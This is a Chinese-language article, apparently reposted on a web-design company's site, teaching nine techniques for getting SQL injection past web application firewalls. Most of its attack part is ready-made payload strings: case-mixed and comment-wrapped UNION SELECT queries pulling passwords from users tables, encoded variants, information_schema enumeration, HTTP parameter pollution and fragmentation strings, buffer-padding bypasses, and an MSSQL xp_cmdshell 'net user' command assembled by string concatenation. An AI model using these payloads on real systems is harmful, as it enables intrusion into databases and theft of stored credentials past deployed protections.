這篇文章將為大家詳細講解有關(guān)SQL注入繞過Web應(yīng)用程序防火墻的9種方式分別是什么,文章內(nèi)容質(zhì)量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關(guān)知識有一定的了解。
成都創(chuàng)新互聯(lián)公司提供成都做網(wǎng)站、網(wǎng)站設(shè)計、網(wǎng)頁設(shè)計,成都品牌網(wǎng)站建設(shè),廣告投放平臺等致力于企業(yè)網(wǎng)站建設(shè)與公司網(wǎng)站制作,10余年的網(wǎng)站開發(fā)和建站經(jīng)驗,助力企業(yè)信息化建設(shè),成功案例突破超過千家,是您實現(xiàn)網(wǎng)站建設(shè)的好選擇.
Web應(yīng)用程序防火墻(WAF)的主要作用是過濾,監(jiān)控和阻止各類進出Web應(yīng)用程序的HTTP流量。WAF區(qū)別于常規(guī)防火墻,因為WAF能夠過濾特定Web應(yīng)用程序的內(nèi)容,而常規(guī)防火墻充當?shù)膭t是服務(wù)器之間的安全門。通過檢查HTTP流量,它可以防止源自Web應(yīng)用安全漏洞的攻擊,如SQL注入,XSS,文件包含和安全配置錯誤。
協(xié)議異常檢測:拒絕不符合HTTP標準的請求
增強的輸入驗證:代理和服務(wù)器端驗證,而不僅僅是客戶端驗證
白名單和黑名單
基于規(guī)則和基于異常的保護:基于規(guī)則的更依賴黑名單機制,基于異常則更靈活
狀態(tài)管理:關(guān)注會話保護還有:Cookie保護,反入侵規(guī)避技術(shù),響應(yīng)監(jiān)控和信息披露保護。
1.當我們在目標URL進行SQL注入測試時,可以通過修改注入語句中字母的大小寫來觸發(fā)WAF保護情況。如果WAF使用區(qū)分大小寫的黑名單,則更改大小寫可能會幫我們成功繞過WAF的過濾。
http://target.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4
2.關(guān)鍵字替換(在關(guān)鍵字中間可插入將會被WAF過濾的字符) - 例如SELECT可插入變成SEL<ECT,一旦插入字符被過濾,它將作為SELECT傳遞。
http://target.com/index.php?page_id=-15&nbsp;UNIunionON SELselectECT 1,2,3,4
3.編碼
+ URL encode
page.php?id=1%252f%252a*/UNION%252f%252a /SELECT
+Hex encode
target.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4… SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))
+Unicode encode
?id=10%D6‘%20AND%201=2%23 SELECT '?'='A'; #1
4.使用注釋
在攻擊字符串中插入注釋。例如,/*!SELECT*/ 這樣WAF可能就會忽略該字符串,但它仍會被傳遞給目標應(yīng)用程序并交由MySQL數(shù)據(jù)庫處理。
index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4 'union%a0select pass from users# index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3 ?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4…
5.某些函數(shù)或命令,因為WAF的過濾機制導致我們無法使用。那么,我們也可以嘗試用一些等價函數(shù)來替代它們。
hex()、bin() ==> ascii() sleep() ==>benchmark() concat_ws()==>group_concat() substr((select 'password'),1,1) = 0x70 strcmp(left('password',1), 0x69) = 1 strcmp(left('password',1), 0x70) = 0 strcmp(left('password',1), 0x71) = -1 mid()、substr() ==> substring() @@user ==> user() @@datadir ==> datadir()
6.使用特殊符號
這里我把非字母數(shù)字的字符都規(guī)在了特殊符號一類,特殊符號有特殊的含義和用法。
+ ` symbol: select `version()`; + +- :select+id-1+1.from users; + @:select@^1.from users; +Mysql function() as xxx +`、~、!、@、%、()、[]、.、-、+ 、|、%00
示例
‘se’+’lec’+’t’ %S%E%L%E%C%T 1 1.aspx?id=1;EXEC(‘ma’+'ster..x’+'p_cm’+'dsh’+'ell ”net user”’) ' or --+2=- -!!!'2 id=1+(UnI)(oN)+(SeL)(EcT)
7.HTTP參數(shù)控制
通過提供多個參數(shù)=相同名稱的值集來混淆WAF。例如 http://example.com?id=1&?id=’ or ‘1’=’1′ — ‘在某些情況下(例如使用Apache/PHP),應(yīng)用程序?qū)H解析最后(第二個) id= 而WAF只解析第一個。在應(yīng)用程序看來這似乎是一個合法的請求,因此應(yīng)用程序會接收并處理這些惡意輸入。如今,大多數(shù)的WAF都不會受到HTTP參數(shù)污染(HPP)的影響,但仍然值得一試。
+ HPP(HTTP Parameter Polution))
/?id=1;select+1,2,3+from+users+where+id=1— /?id=1;select+1&amp;id=2,3+from+users+where+id=1— /?id=1/**/union/*&amp;id=*/select/*&amp;id=*/pwd/*&amp;id=*/from/*&amp;id=*/users
HPP又稱做重復參數(shù)污染,最簡單的就是?uid=1&uid=2&uid=3,對于這種情況,不同的Web服務(wù)器處理方式如下:
+HPF (HTTP Parameter Fragment)
這種方法是HTTP分割注入,同CRLF有相似之處(使用控制字符%0a、%0d等執(zhí)行換行)
/?a=1+union/*&amp;b=*/select+1,pass/*&amp;c=*/from+users-- select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users—
+HPC (HTTP Parameter Contamination)
RFC2396定義了以下字符:
Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' () Reserved : ; / ? : @ &amp; = + $ , Unwise : { } | \ ^ [ ] `
不同的Web服務(wù)器處理處理構(gòu)造得特殊請求時有不同的邏輯:
以魔術(shù)字符%為例,Asp/Asp.net會受到影響
8.緩沖區(qū)溢出
WAF和其他所有的應(yīng)用程序一樣也存在著各種缺陷和漏洞。如果出現(xiàn)緩沖區(qū)溢出的情況,那么WAF可能就會崩潰,即使不能代碼執(zhí)行那也會使WAF無法正常運行。這樣,WAF的安全防護自然也就被瓦解了。
?id=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
9.整合繞過
當使用單一的方式無法繞過時,我們則可以靈活的將多種方式結(jié)合在一起嘗試。
target.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4… id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– - ?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e--
關(guān)于SQL注入繞過Web應(yīng)用程序防火墻的9種方式分別是什么就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。
本文標題:SQL注入繞過Web應(yīng)用程序防火墻的9種方式分別是什么
文章地址:http://newbst.com/article14/jhcege.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供做網(wǎng)站、外貿(mào)建站、網(wǎng)頁設(shè)計公司、手機網(wǎng)站建設(shè)、全網(wǎng)營銷推廣、網(wǎng)站收錄
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)